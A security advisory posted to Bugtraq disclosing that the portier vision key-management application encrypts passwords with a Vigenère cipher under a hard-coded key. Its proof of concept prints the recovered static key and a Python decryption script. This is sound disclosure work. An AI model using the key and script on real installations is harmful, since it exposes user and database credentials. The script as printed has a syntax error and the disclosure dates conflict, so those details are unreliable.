[SYSS-2018-011] Portier - Cryptographic Issues

From: christian.pappas@syss.de
To: bugtraq@securityfocus.com
Cc:
Subject: [SYSS-2018-011] Portier - Cryptographic Issues
Date:


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2018-011
Product: PORTIER
Affected Version(s): 4.4.4.2, 4.4.4.6
Tested Version(s): 4.4.4.2, 4.4.4.6
Vulnerability Type: Cryptographic Issues (CWE-310)
Risk Level: HIGH
Solution Status: Open
Manufacturer Notification: 2018-06-13
Solution Date: -
Public Disclosure: 2018-01-09
CVE Reference: CVE-2019-5723
Author of Advisory: Christian Pappas, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

portier vision is a rich client application for managing door keys allocated 
to certain persons or group of persons.

The manufacturer describes the product as follows (see [1]):

"portier vision
 * manages locking systems and access rights in a modern and efficient manner
 * stores all the details for every single key
 * provides you lightning fast with all the information you need in a format 
   you choose
portier vision easy - secure - fast, our idea of software."

Passwords are stored encrypted rather than as a hash value and the used 
Vigenre algorithm is badly outdated. Moreover, the keyword is static and quite 
too short. Due to this, the passwords stored by the application can be easily 
decrypted.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Both user passwords in the database and the password for the database itself 
in the 'portiervision.ini' configuration file are stored reversible encrypted. 
The enforced password policy requires at least 1 up to 15 character long 
passwords.

The passwords are encrypted by a Vigenre cipher, which is a series of 
interwoven Caesar ciphers based on the characters of the keyword. In this 
particular application, the keyword is  static and 15 bytes long. Static 
means, in this special case, hard coded.

Once an attacker has access to the encrypted passwords, he or she can easily 
decrypt these and, thereby, escalate his or her privileges. As decrypting the 
user passwords the privilege escalation is obviously limited to the 
application. But because the same keyword is reused for encrypting the 
database password, attackers might go beyond this point and try out these 
credentials to take over control of other systems in the corporate network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof-of-Concept (PoC):

To break the encryption and derive the keyword, the following list of pairs of 
plain-text and encrypted passwords is analyzed:

    #n   plain-text password   encrypted password
     1   A                     d
     2   AA                    dI
     3   AAA                   dIo
     4   AAAA                  dIo:
     5   AAAAAAAA              dIo:iO95
     6   AAAAAAAAAAAAAAA       dIo:iO95>O1+qtm
     7   BBBBBBBBBBBBBBB       eJp;jP:6?P2,run
     8   CCCCCCCCCCCCCCC       fKq<kQ;7@Q3-svo
     9   DDDDDDDDDDDDDDD       gLr=lR<8AR4.twp
    10   YYYYYYYYYYYYYYY       !a,R&gQMVgIC.1*
    11   ZZZZZZZZZZZZZZZ       "b-S'hRNWhJD/2+
    12   aaaaaaaaaaaaaaa       )i4Z.oYU^oQK692
    13   bbbbbbbbbbbbbbb       *j5[/pZV_pRL7:3
    14   ABCDEFGHIJKLMNO       dJq=mT?<FX;6"& 
    15   ONMLKJIHGFEDCBA       rV EsXA<DT5.sum

The length of the encrypted password equals the length of the plain-text 
password. Thus, no block ciphers could be in use. Because of an equidistant 
offset of the ASCII representation of m consecutive pairs of plain-text and 
encrypted passwords, it is assumed that a static key is used. The temporary key 
candidate is a list of offsets of the ASCII representation of the encrypted 
password in decimal notation:

    #n               temporary key candidate
    6, 7, 8, 9, 15   [-35, -8, -46, 7, -40, -14, 8, 12, 3, -14, 16, 22, -48, -51, -44]
    10, 11, 12, 13   [ 56, -8,  45, 7,  51, -14, 8, 12, 3, -14, 16, 22,  43,  40,  47]
    14               [-35, -8, -46, 7, -40, -14, 8, 12, 3, -14, 16, 22,  43,  40,  47]

The difference between the offsets of each temporary key candidate to the 
others is always 91, so the static key has to be the following:

    [-35, -8, -46, 7, -40, -14, 8, 12, 3, -14, 16, 22, -48, -51, -44]

The first printable ASCII character is the space. Its decimal value is 32. But 
the application does not accept spaces in the password. Therefore, the 
effective first character has the decimal value 33. This results in the 
following Python script for decrypting the passwords:

    #!/bin/python
    import sys

    static_key = [-35, -8, -46, 7, -40, -14, 8, 12, 3, -14, 16, 22, -48, -51, -44]

    encrypted_password = list(sys.argv[1])
    key = static_key[:len(encrypted_password)]
    plain-text_password = list()

    for i in range(len(encrypted_password)):
        decrypted_character = (ord(encrypted_password[i]) - 33 + key[i] + 91) % 91 + 33
        plain-text_password.append(chr(decrypted_character))

    print("Decrypted password: " + "".join(plain-text_password))

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Store user passwords only as a hash value. Therefore, a suitable cryptographic 
hashing algorithm like PBKDF2 or bcrypt should be chosen. As it comes to the 
implementation, it should be made use of well-known libraries or operating 
system services. SySS GmbH is not aware of a solution to the reported security 
issue provided by the manufacturer.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-05-23: Vulnerability discovered
2018-06-13: Vulnerability reported to manufacturer
2018-01-09: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for PORTIER
    https://portier.de/
[2] SySS Security Advisory SYSS-2018-011
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-011.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Pappas of SySS GmbH.

E-Mail: christian.pappas@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Pappas.asc
Key ID: 0xC5D4E3BA8BA76B25
Key Fingerprint: 5655 FDBE 40DF 0CC4 F143 9877 C5D4 E3BA 8BA7 6B25

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEEVlX9vkDfDMTxQ5h3xdTjuounayUFAlw18kUACgkQxdTjuoun
ayUWtAgAiFGSaRBx3GA1VCzpKFitumz8kE3lEmvAS8AxL4jXns/Xaa9+U+5lJxCb
Q6TguxeJxBY3ZB4Y4JOWDRlzl5YQxDP0KEa/Z5L4u0Xb1q+2kdSbtN97WheZDwPs
RoB8hJzsEi/a2GcRDmEj/blZmcPdll9L8nRa/vAFTrgkmtS97DEQ3woP6c0P0+sg
AlzD3UVgshB8+ar0IyKiFSht+bDWs5nvyXHPaC+Qc7kokkztHtuorUtbcVjm+W1h
2Seqxa2ad2f766F6pmn+GLehdSl8XFr5fcwqGRMvHv7OgvSL13ID2OXN0uqLy4du
ddVdSLD530mdqs+IXTjCKoflIdnKPg==
=bPfI
-----END PGP SIGNATURE-----





Copyright © 1995-2019 LinuxRocket.net. All rights reserved.